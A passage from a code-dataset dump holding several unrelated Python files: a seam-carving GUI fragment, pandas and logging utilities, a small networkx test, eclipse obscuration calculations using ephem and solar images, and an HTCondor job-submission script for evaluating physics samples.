modelimageinputdialog.configure(text = \"Modelpath: \" + modelimagefilename[:28] + \"[...]\")\n else:\n modelimageinputdialog.configure(text = \"Modelpath: \" + modelimagefilename)\n modelimagetemp.configure(text = modelimagefilename)\n return modelimagefilename\n\nopen_modelimage_button = ctk.CTkButton(\n modelframe,\n text = \"Open image\",\n command = open_modelimage\n)\nopen_modelimage_button.pack(expand=True)\n\ndef checkimage():\n print(\"Test\")\n\n\n\n\ncheckimagebutton = ctk.CTkButton(modelframe, text = \"Check Image\", command = checkimage)\ncheckimagebutton.pack(padx = 2, pady = 2)\n# Run the main loop\nroot.mainloop()","repo_name":"tleidinggit/ComputerVisionPraktikum","sub_path":"seam_carve_main.py","file_name":"seam_carve_main.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37800407632","text":"\"\"\"Module for utility functions.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport re\nfrom collections.abc import Callable\nfrom pathlib import Path\nfrom time import time\n\nimport pandas as pd\nfrom rich import print as rprint\nfrom rich.logging import RichHandler\n\nfrom modern_ml.constant import P, R\nfrom modern_ml.path import LOGS_DIR\n\n\n# Define function to initialize the logger\ndef init_logger(file_name: str, sym_link_dir: None | str) -> None:\n \"\"\"\n Initialize the logger for the application.\n\n This function sets up the logging configurations, including file logging and standard output logging.\n It also creates sym links to the log file if specified.\n\n Args:\n file_name (str): The name of the log file.\n sym_link_dir (None or str): The directory where sym links to the log file will be created.\n \"\"\"\n # Set the log file path and create it if it does not exist\n log_file: Path = LOGS_DIR / file_name\n log_file.touch(exist_ok=True)\n\n # Create sym links if the directory is specified\n if sym_link_dir:\n sym_link_dir_path = Path(sym_link_dir)\n sym_link_dir_path.mkdir(parents=True, exist_ok=True)\n sym_link_file = sym_link_dir_path / file_name\n sym_link_file.unlink(missing_ok=True)\n sym_link_file.symlink_to(log_file)\n\n # Set the log formatter and handler levels for the log file\n log_formatter = logging.Formatter(\"%(asctime)s:%(levelname)s: %(message)s\")\n log_formatter.datefmt = \"%Y-%m-%d %H:%M:%S\"\n log_handler = logging.FileHandler(str(log_file))\n log_handler.setFormatter(log_formatter)\n log_handler.setLevel(logging.INFO)\n\n # Set 
the log formatter and handler levels for the standard output\n std_log_formatter = logging.Formatter(\"%(message)s\")\n std_log_formatter.datefmt = \"%H:%M:%S\"\n std_log_handler = RichHandler()\n std_log_handler.setFormatter(std_log_formatter)\n\n # Add handlers to the logger and set the logging level\n logger = logging.getLogger()\n logger.addHandler(std_log_handler)\n logger.addHandler(log_handler)\n logger.setLevel(logging.DEBUG)\n\n # Suppress library logging to only show errors\n for key in logging.Logger.manager.loggerDict:\n logging.getLogger(key).setLevel(logging.ERROR)\n\n # Log the path to log file\n logging.info(f\"Path to log file: {log_file.resolve()}\")\n\n\n# Define a decorator function to print the execution time of a function\ndef timer_decorator(func: Callable[P, R]) -> Callable[P, R]:\n \"\"\"\n Decorator to measure and log the execution time of a function.\n\n Args:\n func (Callable[P, R]): The function to be decorated.\n\n Returns:\n Callable[P, R]: The decorated function which logs its execution time.\n \"\"\"\n\n def wrapper(*args: P.args, **kwargs: P.kwargs) -> R:\n \"\"\"\n Wrapper function to measure the execution time.\n\n Args:\n *args (P.args): Positional arguments for the function.\n **kwargs (P.kwargs): Keyword arguments for the function.\n\n Returns:\n R: The result of the function.\n \"\"\"\n # Get the start time and execute the function\n t1: float = time()\n result: R = func(*args, **kwargs)\n\n # Get the end time and calculate the elapsed time\n t2: float = time()\n elapsed_time = t2 - t1\n\n # Log the execution time and return the result of the function\n logging.info(\n f\"Method {func.__name__!r} of module {func.__module__!r} executed in {elapsed_time:.4f} seconds\"\n )\n return result\n\n return wrapper\n\n\ndef format_value(value: str | int | float) -> str:\n \"\"\"Format the value to 2 decimal places if it's a float.\"\"\"\n if isinstance(value, float):\n return f\"{value:.2f}\"\n return str(value)\n\n\ndef simple_tabulate(data: list, headers: list) -> str:\n \"\"\"Create a simple tabulated string representation of the provided data.\"\"\"\n # Determine the maximum width for each column\n col_widths = [max(len(str(value)) for value in col) for col in zip(*data, headers)]\n\n # Format rows with data\n rows = [headers] + data\n formatted_rows = [\n \"| \"\n + \" | \".join(\n [\n f\"{format_value(value).ljust(width)}\"\n for value, width in zip(row, col_widths)\n ]\n )\n + \" |\"\n for row in rows\n ]\n\n # Combine everything\n return \"\\n\".join(formatted_rows)\n\n\ndef get_files(\n dir_of_files: Path,\n ends_with: str,\n exclude_containing: str | None = None,\n descending: bool = True,\n) -> list[Path]:\n \"\"\"Retrieve files from a directory based on specific criteria.\n\n Args:\n dir_of_files (Path): Directory to search.\n ends_with (str): Desired file ending.\n exclude_containing (str, optional): String to exclude from file names. Defaults to None.\n descending (bool, optional): Whether to return files in descending order. 
Defaults to True.\n\n Returns:\n list[Path]: List of files that match the criteria.\n \"\"\"\n # Collect all file paths in the directory that meet the 'ends_with' criteria\n file_paths: list[Path] = [\n file_path\n for file_path in dir_of_files.iterdir()\n if file_path.is_file() and file_path.name.endswith(ends_with)\n ]\n # If exclude_containing is provided, filter out files that contain the exclude_containing string\n if exclude_containing:\n file_paths = [\n file_path\n for file_path in file_paths\n if exclude_containing not in file_path.name\n ]\n # Order the file paths by their name descending (latest first) or ascending (earliest first)\n file_paths.sort(reverse=descending)\n return file_paths\n\n\ndef read_by_extension(path: Path, read: bool = True) -> Callable:\n \"\"\"Read or write a file based on its extension.\n\n Args:\n path (Path): Path to the file.\n\n Returns:\n Callable: The function to read or write the file.\n \"\"\"\n if read:\n if path.suffix == \".feather\":\n return pd.read_feather\n elif path.suffix == \".csv\":\n return pd.read_csv\n elif path.suffix == \".xlsx\":\n return pd.read_excel\n elif path.suffix == \".pkl\":\n return pd.read_pickle\n else:\n raise ValueError(f\"Unsupported file extension: {path.suffix}\")\n else:\n if path.suffix == \".feather\":\n return pd.DataFrame.to_feather\n elif path.suffix == \".csv\":\n return pd.DataFrame.to_csv\n elif path.suffix == \".xlsx\":\n return pd.DataFrame.to_excel\n elif path.suffix == \".pkl\":\n return pd.DataFrame.to_pickle\n else:\n raise ValueError(f\"Unsupported file extension: {path.suffix}\")\n\n\ndef to_snake(camel_str: str) -> str:\n # Remove all whitespace\n camel_str = camel_str.replace(\" \", \"\")\n\n # Add an underscore before each uppercase letter that is either:\n # (a) preceded by a lowercase letter, or\n # (b) followed by a lowercase letter (and is not at the start of the string)\n snake_str = re.sub(r\"((?<=[a-z0-9])[A-Z]|(?!^)[A-Z](?=[a-z]))\", r\"_\\1\", camel_str)\n\n # Convert to lowercase using .casefold() which is a stronger version of .lower()\n return snake_str.casefold()\n\n\ndef apply_to_column(df: pd.DataFrame, col_name: str, func: Callable) -> pd.Series:\n try:\n rprint(df[col_name].value_counts(dropna=False).head(10))\n print(f\"New value counts after applying {func.__name__} to {col_name}\")\n return_series = df[col_name].apply(func)\n rprint(return_series.value_counts(dropna=False).head(10))\n return return_series\n except Exception as e:\n rprint(f\"Error applying {func.__name__} to {col_name}: {str(e)}\")\n return df[col_name]\n","repo_name":"oedokumaci/modern-ml","sub_path":"src/modern_ml/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29901378652","text":"import networkx as nx\n\nG=nx.MultiGraph()\nG.add_node('A',role='manager')\nG.add_edge('A','B',relation = 'friend')\nG.add_edge('A','C', relation = 'business partner')\nG.add_edge('A','B', relation = 'classmate')\nG.node['A']['role'] = 'team member'\nG.node['B']['role'] = 'engineer'\n\n#P = G.get_edge_data(\"A\", \"B\")[0]\n#node = G.number_of_edges()\nP = G.edge()\n\n#print (node)","repo_name":"sadfool1/Applied-Social-Networks---Networkx-Coursera-","sub_path":"Week 1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10599192284","text":"# -*- coding: utf-8 
-*-\n\"\"\"\nCreated on Mon Apr 26 13:17:51 2021\n\n@author: smrak@bu.edu\n\"\"\"\n\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport ephem\nimport concurrent.futures\nfrom scipy import ndimage\nRE = 6371 #km\n\ndef get_sza(time, glon, glat, horizon=None, alt_km=None):\n \n if horizon is None:\n if alt_km is None:\n alt_km = 0\n elif isinstance(alt_km, (list, np.ndarray)):\n alt_km = alt_km[0]\n horizon = -np.degrees(np.arccos(RE/(RE + alt_km)))\n \n def _sza(x, y):\n \n obs = ephem.Observer()\n obs.lat = np.deg2rad(y)\n obs.lon = np.deg2rad(x)\n obs.date = ephem.Date(time)\n \n sun = ephem.Sun()\n sun.compute(obs)\n sza = 90 - np.degrees(sun.alt) + horizon\n return sza\n def _sza_time(t):\n \n obs = ephem.Observer()\n obs.lat = np.deg2rad(glat)\n obs.lon = np.deg2rad(glon)\n obs.date = ephem.Date(t)\n \n sun = ephem.Sun()\n sun.compute(obs)\n sza = 90 - np.degrees(sun.alt) + horizon\n return sza\n \n def _sza_all(t, x, y):\n obs = ephem.Observer()\n obs.lat = np.deg2rad(y)\n obs.lon = np.deg2rad(x)\n obs.date = ephem.Date(t)\n \n sun = ephem.Sun()\n sun.compute(obs)\n sza = 90 - np.degrees(sun.alt) + horizon\n return sza\n \n if isinstance(glon, np.ndarray) and isinstance(time, datetime):\n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n sza_worker = np.asarray([ex.submit(_sza, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n\n sza = np.nan*np.ones(glon.ravel().size)\n for i in range(sza_worker.size):\n sza[i] = sza_worker[i].result()\n sza = sza.reshape(glon.shape)\n \n elif isinstance(time, np.ndarray) and not isinstance(glon, np.ndarray):\n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n sza_worker = np.asarray([ex.submit(_sza_time, time[i]) for i in range(time.size)])\n\n sza = np.nan*np.ones(time.size)\n for i in range(sza_worker.size):\n sza[i] = sza_worker[i].result()\n \n elif isinstance(time, np.ndarray) and isinstance(glon, np.ndarray) and isinstance(glat, np.ndarray):\n sza = np.nan * np.ones(time.size)\n for i in range(time.size):\n sza[i] = _sza_all(time[i], glon[i], glat[i])\n \n else:\n sza = _sza_time(time)\n return sza\n\ndef get_angles(time, glon, glat, ghgt=0):\n \n def _angles(glon, glat):\n sun, moon = objects(time,glon,glat,ghgt)\n sun_moon_sep = separation(sun.az, sun.alt, moon.az, moon.alt)\n sun_moon_azimuth = azimuth(sun.az, sun.alt, moon.az, moon.alt)\n return sun_moon_sep,sun_moon_azimuth,moon.radius\n \n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n angles_worker = np.asarray([ex.submit(_angles, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n\n sun_moon_separation_radian = np.nan*np.ones(glon.ravel().size)\n sun_moon_azimuth_radian = np.nan*np.ones(glon.ravel().size)\n moon_radius_radian = np.nan*np.ones(glon.ravel().size)\n for i in range(angles_worker.size):\n sun_moon_separation_radian[i] = angles_worker[i].result()[0]\n sun_moon_azimuth_radian[i] = angles_worker[i].result()[1]\n moon_radius_radian[i] = angles_worker[i].result()[2]\n \n return sun_moon_separation_radian.reshape(glon.shape), sun_moon_azimuth_radian.reshape(glon.shape), moon_radius_radian.reshape(glon.shape)\n\n#def get_parallactic_angle(time, glon, glat, ghgt):\n# \n# def _eta(glon, glat):\n# sun, moon = objects(time,glon,glat,ghgt)\n# return parallactic_angle(sun.az, sun.dec, glat)\n# \n# def _eta_times(t):\n# sun, moon = objects(t, glon, glat, ghgt)\n# return parallactic_angle(sun.az, sun.dec, glat)\n# \n# if isinstance(glon, np.ndarray) and isinstance(time, datetime):\n# with 
concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n#            eta_worker = np.asarray([ex.submit(_eta, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n#        \n#        eta = np.nan*np.ones(glon.ravel().size)\n#        for i in range(eta_worker.size):\n#            eta[i] = eta_worker[i].result()\n#        \n#        return eta.reshape(glon.shape)\n#    \n#    elif isinstance(time, np.ndarray):\n#        eta = np.nan*np.ones(time.size)\n#        with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n#            eta_worker = np.asarray([ex.submit(_eta_times, time[i]) for i in range(time.size)])\n#        for i in range(eta_worker.size):\n#            eta[i] = eta_worker[i].result()\n#        return eta\n#    else:\n#        eta = _eta(glon, glat)\n#        return eta\n\ndef get_parallactic_angle(time, glon, glat, ghgt):\n    \n    def _eta(glon, glat):\n        sun, moon = objects(time,glon,glat,ghgt)\n        return parallactic_angle(sun.az, sun.dec, sun.alt, glat)\n    \n    def _eta_times(t):\n        sun, moon = objects(t, glon, glat, ghgt)\n        return parallactic_angle(sun.az, sun.dec, sun.alt, glat)\n    \n    if isinstance(glon, np.ndarray) and isinstance(time, datetime):\n        with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n            eta_worker = np.asarray([ex.submit(_eta, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n        \n        eta = np.nan*np.ones(glon.ravel().size)\n        for i in range(eta_worker.size):\n            eta[i] = eta_worker[i].result()\n        \n        return eta.reshape(glon.shape)\n    \n    elif isinstance(time, np.ndarray):\n        eta = np.nan*np.ones(time.size)\n        with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n            eta_worker = np.asarray([ex.submit(_eta_times, time[i]) for i in range(time.size)])\n        for i in range(eta_worker.size):\n            eta[i] = eta_worker[i].result()\n        return eta\n    else:\n        eta = _eta(glon, glat)\n        return eta\n\ndef get_eof_mask_from_angles(image, sep, azm, eta, mrad, x0, y0, imres, pixscale):\n    mx0, my0 = rotate(sep, azm-eta, 0.0, 0.0)\n    mask = moon_mask(imres, mx0*pixscale + x0, my0*pixscale + y0, np.round(mrad, 8)*pixscale)\n    return np.nansum(np.multiply(image,mask)) / np.nansum(image)\n\ndef get_times(t0,t1,dm=0, ds=0):\n    assert (dm>0) or (ds>0)\n    times =[]\n    while t0 <= t1:\n        times.append(t0)\n        t0 += timedelta(minutes = dm, seconds=ds)\n    return np.array(times)\n\ndef moon_mask(N, mx1, my1, r):\n    xaxis = np.arange(N) - mx1\n    yaxis = np.arange(N) - my1\n    mask = ((np.zeros((N, N)) + yaxis*yaxis).T + xaxis*xaxis) < r*r\n    return ~mask\n\ndef horizon_mask(horizon, pixscale, selv, y0, imsdo):\n#    if np.degrees(horizon) > -3:\n    hmask = np.ones(imsdo.shape[0])\n    for i in range(hmask.size):\n        tmp = (i-y0) / pixscale\n        hmask[i] = 0 if tmp < horizon else 1\n#    for i in range(hmask.size):\n#        tmp = selv + ((i - int(y0)) / pixscale)\n#        if tmp < horizon:\n#            hmask[i] = 0\n    hmask = np.array([hmask,]*imsdo.shape[0]).T\n#    else:\n#        hmask = np.ones(imsdo.shape)\n#    print (hmask)\n    return hmask\n\n#def parallactic_angle(sazm, sdec, glat):\n#    sineta = np.sin(sazm) * np.cos(np.radians(glat)) / np.cos(sdec)\n#    return -np.arcsin(sineta)\n\ndef parallactic_angle(sazm, sdec, salt, glat):\n    zd = np.pi/2 - salt\n    numerator = np.sin(np.radians(glat)) - (np.sin(sdec)*np.cos(zd))\n    denominator = np.cos(sdec) * np.sin(zd)\n    coseta = numerator / denominator\n    if coseta > 1.00 and coseta <= 1.001:\n        coseta = 1.0\n    elif coseta > 1.001:\n        print (\"Coseta > 1.0???\")\n    \n    if sazm < np.pi:\n        return +np.arccos(coseta)\n    else:\n        # mirror the sign on the other side of the meridian\n        return -np.arccos(coseta)\n\ndef rotate(sep, azm, x0, y0):\n#    (elv,azm,olon,olat,xlon,xlat)\n    sint = np.sin(sep)\n    cost = np.cos(sep)\n    sinp = np.sin(azm)\n    cosp = np.cos(azm)\n    sinl = np.sin(y0)\n    
cosl = np.cos(y0)\n \n y1 = np.arcsin( sinl*cost + cosl*sint*cosp )\n x1 = x0 + np.arctan2( sint*sinp, cosl*cost - sinl*sint*cosp )\n \n return x1, y1\n\ndef objects(T, glon, glat, ghgt):\n assert isinstance(T, datetime)\n observer = ephem.Observer()\n observer.lon = str(glon)\n observer.lat = str(glat)\n observer.elevation = ghgt\n observer.date = T\n observer.pressure = 0\n observer.horizon = -np.arccos(RE / (RE + ghgt/1e3))\n \n sun = ephem.Sun(observer)\n moon = ephem.Moon(observer)\n \n return sun, moon\n\ndef azimuth(sazm, selv, mazm, melv):\n \n coslt1 = np.cos(melv)\n sinlt1 = np.sin(melv)\n \n coslt0 = np.cos(selv)\n sinlt0 = np.sin(selv)\n \n cosl0l1 = np.cos(mazm-sazm)\n sinl0l1 = np.sin(mazm-sazm)\n \n cosc = (sinlt0 * sinlt1) + (coslt0 * coslt1 * cosl0l1) # Cos(a to b)\n sinc = np.sqrt(1 - (cosc*cosc))\n \n if (abs(sinc) > 1e-7):# Small angle?\n cosaz = (coslt0 * sinlt1 - sinlt0 * coslt1 * cosl0l1) / sinc # Azimuth\n sinaz = (sinl0l1 * coslt1) / sinc\n else: # It is antipodal\n cosaz = 1\n sinaz = 0\n \n azm = np.arctan2(sinaz, cosaz)\n return azm\n\ndef separation(sazm, selv, mazm, melv):\n return np.round(ephem.separation((sazm, selv), (mazm, melv)), 8)\n\ndef get_EOF(sr, mr, mx0, my0):\n \n sx0 = 0\n sy0 = 0\n \n if mr > sr:\n r1 = mr\n r2 = sr\n else:\n r1 = sr\n r2 = mr\n d = np.sqrt(abs(sx0-mx0)**2 + abs(sy0-my0)**2)\n if d > (r1+r2)*1.05:\n of = 1\n elif d <= (r1-r2):\n of = 1 - ((np.pi * mr**2) / (np.pi * sr**2))\n else:\n d1 = (r1**2 - r2**2 + d**2) / (2*d)\n d2 = d - d1\n \n A = ( r1**2 * np.arccos(d1/r1) - (d1 * np.sqrt(r1**2 - d1**2)) ) + \\\n ( r2**2 * np.arccos(d2/r2) - (d2 * np.sqrt(r2**2 - d2**2)) )\n\n of = 1 - (A / (np.pi * sr**2)) if A > 0 else 1\n \n return of\n\n#def eclipse_geo_novas(T, glon, glat, ghgt=0, srad_fact=1, plot=0):\n# assert isinstance(T, datetime)\n# hour = T.hour + T.minute / 60 + T.second / 3600\n# sazm,selv,srad,sdec,mazm,melv,mrad,azm,sm_dist = eomff.eom(T.year,T.month,T.day,hour,glon,glat,ghgt,srad_fact)\n# \n# horizon = (-np.arccos(RE / (RE + ghgt/1e3)) - selv - srad) #/ srad\n# if horizon > 0:\n# return 0\n# else:\n# mx0, my0 = eomff.rotate(sm_dist, azm, 0.0, 0.0)\n# of = get_EOF(srad, mrad, mx0, my0)\n# return of\n \ndef mask_geo_ephem(T, glon, glat, ghgt=0, srad_fact=1, plot=0):\n sun, moon = objects(T, glon, glat, ghgt)\n srad = np.round(sun.radius * srad_fact, 8)\n mrad = np.round(moon.radius, 8)\n horizon = (-np.arccos(RE / (RE + ghgt/1e3)) - sun.alt - sun.radius) #/ srad\n if horizon > 0:\n return 0\n else:\n sm_dist = np.round(ephem.separation((sun.az, sun.alt), (moon.az, moon.alt)), 8)\n azm = azimuth(sun.az, sun.alt, moon.az, moon.alt)\n mx0, my0 = rotate(sm_dist, azm, 0.0, 0.0)\n of = get_EOF(srad, mrad, mx0, my0)\n return of\n\ndef mask_sdo_ephem(T, glon, glat, ghgt, x0, y0, imsdo, pixscale, use_parallactic_angle=1):\n sun, moon = objects(T,glon,glat,ghgt)\n sazm, selv = sun.az, sun.alt\n mazm, melv = moon.az, moon.alt\n if sazm > np.pi:\n sazm -= 2*np.pi\n if mazm > np.pi:\n mazm -= 2*np.pi\n \n horizon = (-np.arccos(RE / (RE + ghgt/1e3)) - selv - sun.radius)\n sep = separation(sazm, selv, mazm, melv) \n if horizon*pixscale >= (imsdo.shape[0]/2-imsdo.shape[0]):\n hmask = horizon_mask(horizon=horizon, selv=selv, imsdo=imsdo, pixscale=pixscale, y0=y0)\n else:\n hmask = np.ones_like(imsdo)\n if use_parallactic_angle:\n eta = parallactic_angle(sazm, sun.dec, selv, glat)\n else:\n eta = 0\n# if (sep*pixscale) < (imsdo.shape[0]*1.4142+np.round(moon.radius, 8)*pixscale):\n if (sep*pixscale) < (imsdo.shape[0]+np.round(moon.radius, 
8)*pixscale):\n \n azm = azimuth(sazm, selv, mazm, melv)\n # Rotation of the moon if ~100x faster than rotation of the Sun for the parallactinc angle\n # ndimage.rotate(imsdo, np.rad2deg(eta), reshape=False) --- takes about 3seconds to compute\n mx0, my0 = rotate(sep, azm+eta, 0.0, 0.0)\n mmask = moon_mask(imsdo.shape[0], mx0*pixscale + x0, my0*pixscale + y0, np.round(moon.radius, 8)*pixscale)\n mask = np.multiply(hmask, mmask)\n of = np.nansum(np.multiply(imsdo,mask)) / np.nansum(imsdo)\n else:\n of = np.nansum(np.multiply(imsdo,hmask)) / np.nansum(imsdo)\n return of\n\ndef eof_time(t0, t1, glon, glat, ghgt, srad_fact=1, dm=10, ds=0, mode='ephem'):\n times = get_times(t0,t1,dm=dm, ds=ds)\n if not isinstance(srad_fact, list):\n srad_fact = [srad_fact]\n \n OF = np.nan * np.zeros((times.size, len(srad_fact)))\n \n for sf, srad_factor in enumerate(srad_fact):\n for i,T in enumerate(times):\n# if mode == 'novas':\n# OF[i, sf] = eclipse_geo_novas(T, glon=glon, glat=glat, ghgt=ghgt, srad_fact=srad_factor)\n# else:\n OF[i, sf] = mask_geo_ephem(T, glon=glon, glat=glat, ghgt=ghgt, srad_fact=srad_factor)\n OF[OF<0] = 0\n return times, np.squeeze(OF)\n\ndef mask_latalt_geo(T, glat, ghgt, glon0=0, srad_fact=1, mode='novas'):\n assert isinstance(ghgt, np.ndarray)\n assert isinstance(glat, np.ndarray)\n assert isinstance(T, datetime)\n if not isinstance(srad_fact, list):\n srad_fact_list = [srad_fact]\n else:\n srad_fact_list = srad_fact\n \n OF = np.zeros((glat.size, ghgt.size, len(srad_fact_list)))\n for s, srad_fact in enumerate(srad_fact_list):\n for i, lat in enumerate(glat):\n for j, alt in enumerate(ghgt):\n# if mode == 'novas':\n# OF[i,j,s] = eclipse_geo_novas(T=T, glon=glon0, glat=lat, ghgt=alt, srad_fact=srad_fact)\n# else:\n OF[i,j,s] = mask_geo_ephem(T=T, glon=glon0, glat=lat, ghgt=alt, srad_fact=srad_fact)\n return np.squeeze(OF)\n\ndef mask_lonlat_geo(T, glon, glat, ghgt=0, srad_fact=1, mode='novas'):\n \n assert isinstance(glon, np.ndarray)\n assert isinstance(glat, np.ndarray)\n assert isinstance(T, datetime)\n \n OF = np.zeros((glon.size, glat.size))\n for i, lon in enumerate(glon):\n for j, lat in enumerate(glat):\n# if mode == 'novas':\n# OF[i,j] = eclipse_geo_novas(T=T, glon=lon, glat=lat, ghgt=ghgt, srad_fact=srad_fact)\n# else:\n OF[i,j] = mask_geo_ephem(T=T, glon=lon, glat=lat, ghgt=ghgt, srad_fact=srad_fact)\n return np.squeeze(OF)\n\n#%% SDO AIA\ndef eof_time_sdo(SDO, t0, t1, glon, glat, ghgt, wl=193, dm=10,ds=0):\n\n times = get_times(t0,t1,dm=dm,ds=ds)\n OF = np.ones(times.size)\n instrument = list(SDO.variables)[0][:3]\n imsdo = SDO[list(SDO.variables)[0]].values\n if instrument == 'EIT':\n imsdo = np.subtract(ndimage.rotate(imsdo, 180), 900)\n for i,T in enumerate(times):\n if (i+1)%10 == 0:\n print (\"Processing {}/{}\".format(i+1, times.size))\n OF[i] = mask_sdo_ephem(T, glon, glat, ghgt, SDO.x0, SDO.y0, imsdo, SDO.pixscale)\n return times, OF\n\ndef mask_lonlat_sdo(SDO, T, glon, glat, ghgt, wl=193, verbose=False):\n assert isinstance(glon, np.ndarray)\n assert isinstance(glat, np.ndarray)\n OF = np.ones((glon.size, glat.size))\n if verbose:\n c = 1\n C = glon.size*glat.size\n for i in range(glon.size):\n if verbose:\n t0 = datetime.now()\n for j in range(glat.size):\n if verbose:\n if c%1000 == 0:\n print (\"{}/{}\".format(c,C))\n OF[i,j] = mask_sdo_ephem(T, glon[i], glat[j], ghgt=ghgt, x0=SDO.x0, y0=SDO.y0, imsdo=SDO['AIA{}'.format(wl)].values, pixscale=SDO.pixscale)\n if verbose:\n c+=1\n if verbose:\n print(datetime.now()-t0)\n return OF\n\ndef mask_latalt_sdo(SDO, T, 
glon, glat, ghgt, wl=193, verbose=False):\n assert isinstance(ghgt, np.ndarray)\n assert isinstance(glat, np.ndarray)\n assert isinstance(glon, (int, float))\n \n OF = np.ones((glat.size, ghgt.size))\n if verbose:\n c = 1\n C = glon.size*glat.size\n for i in range(glat.size):\n if verbose:\n t0 = datetime.now()\n for j in range(ghgt.size):\n if verbose:\n if c%1000 == 0:\n print (\"{}/{}\".format(c,C))\n OF[i,j] = mask_sdo_ephem(T, glon, glat[i], ghgt=ghgt[j], x0=SDO.x0, y0=SDO.y0, imsdo=SDO['AIA{}'.format(wl)].values, pixscale=SDO.pixscale)\n if verbose:\n c+=1\n if verbose:\n print(datetime.now()-t0)\n return OF\n\n# Spacecraft\ndef eof_satellite(times, glon, glat, alt_km, SDO=None, srad=1.0, wl='geo', \n use_parallactic_angle=1, verbose=False):\n OF = np.zeros(times.size)\n for i,T in enumerate(times):\n if verbose:\n if (i+1)%10 == 0:\n print (\"Processing {}/{}\".format(i+1, times.size))\n sza = get_sza(T, glon[i], glat[i], alt_km=alt_km[i])\n if sza < 95:\n if SDO is not None:\n OF[i] = mask_sdo_ephem(T, glon[i], glat[i], alt_km[i]*1e3, SDO.x0, SDO.y0, \n SDO['AIA{}'.format(wl)].values, SDO.pixscale,\n use_parallactic_angle=use_parallactic_angle)\n else:\n OF[i] = mask_geo_ephem(T, glon[i], glat[i], alt_km[i]*1e3, srad_fact=srad)\n return times, OF","repo_name":"aldebaran1/pyEclipse","sub_path":"eclipse/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17461,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"19776697561","text":"import json\nfrom glob import glob\nimport os\nfrom argparse import ArgumentParser\nfrom subprocess import Popen, PIPE\nfrom pathlib2 import Path\n\n\ndef make_parser():\n parser = ArgumentParser(description=\"Submit predicting of LLR \\\nSamples\")\n parser.add_argument(\"-s\", \"--submit_base\", type=str, \n help=\"Base dir to submit from\")\n parser.add_argument(\"-o\", \"--output_dir\" ,type=str,\n help=\"Dir to write output files to\")\n parser.add_argument(\"-y\", \"--year\", type=str, \n help=\"16, 17 or 18\")\n parser.add_argument(\"--add_htautau\", action=\"store_true\",\n help=\"If set, evaluate htautau model.\")\n parser.add_argument(\"-j\", \"--json\", type=str,\n help=\"JSON File containing paths to samples\")\n parser.add_argument(\"-n\", \"--n_files\" ,type=int, default=5,\n help=\"number of files per job\")\n return parser\n \n\ndef checkmake_dir(path):\n if not os.path.exists(path):\n print(f\"{path} does not exist.\")\n print(\"Shall I create it now?\")\n yn = input(\"[y/n] ?\")\n if yn.strip().lower() == 'y':\n print('Creating dir(s)!')\n os.makedirs(path)\n else:\n raise ValueError(f\"{path} does not exist\")\n\n\ndef return_subfile(outdir, executable):\n file_str = f\"executable={executable}\\n\\\nlog = singularity.$(ClusterId).log\\n\\\nerror = singularity.$(ClusterId).$(ProcId).err\\n\\\noutput = singularity.$(ClusterId).$(ProcId).out\\n\\\n\\n\\\nshould_transfer_files = YES\\n\\\nMY.JobFlavour = \\\"microcentury\\\"\\n\\\noutput_destination = root://eosuser.cern.ch//{outdir}\\n\\\nMY.XRDCP_CREATE_DIR = True\\n\\\nMY.SingularityImage = \\\"/cvmfs/unpacked.cern.ch/registry.hub.docker.com/jwulff/lumin_3.8:latest\\\"\\n\\\n\\n\\\nArguments = $(FILES)\\n\\\nqueue\"\n# transfer_input_files = root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/branchnames.py, 
root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/feature_calc.py,root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/features.py,root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/first_nn.py,root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/helpers.py\\n\\\n return file_str\n\n\ndef return_executable(sum_w, year, sample_id, add_htautau):\n function_call_str = f'python ${{EXE}} -f $@ -s {sum_w} -i {sample_id} -y {year}'\n if add_htautau:\n function_call_str += \" --add_htautau\"\n file_str = f'#!/usr/bin/bash\\n\\\nEXE=\"/eos/user/j/jowulff/res_HH/hbt_data_proc/evaluate_klub.py\"\\n\\\n{function_call_str} || exit 1\\n\\\nexit 0'\n return file_str\n\n\ndef parse_goodfile_txt(goodfile:Path,):\n skims_dir = goodfile.absolute().parent\n with open(goodfile) as gfile:\n gfiles = sorted([Path(line.rstrip()) for line in gfile])\n if len(gfiles) == 0:\n print(f\"Found 0 files in {goodfile}. Globbing all .root files in skim dir.\")\n # goodfiles.txt is empty: just glob all .root files in \n # skims dir and hope they're good\n gfiles = sorted([i for i in skims_dir.glob(\"*.root\")])\n else:\n # check if the paths have been updated\n if gfiles[0].parent != skims_dir:\n # if not stick the filename on the end of the provided path\n # and hope for the best\n gfiles = [skims_dir / i.name for i in gfiles]\n return [str(gfile) for gfile in gfiles]\n\n\ndef main(submit_base_dir: str, \n sample_json: str, \n outdir: str,\n year: str,\n add_htautau: bool,\n n_files: int=5):\n\n with open(sample_json) as f:\n d = json.load(f)\n # select the year\n d = d[year]\n\n if not submit_base_dir.startswith(\"/afs\"):\n raise ValueError(\"Submission must happen from 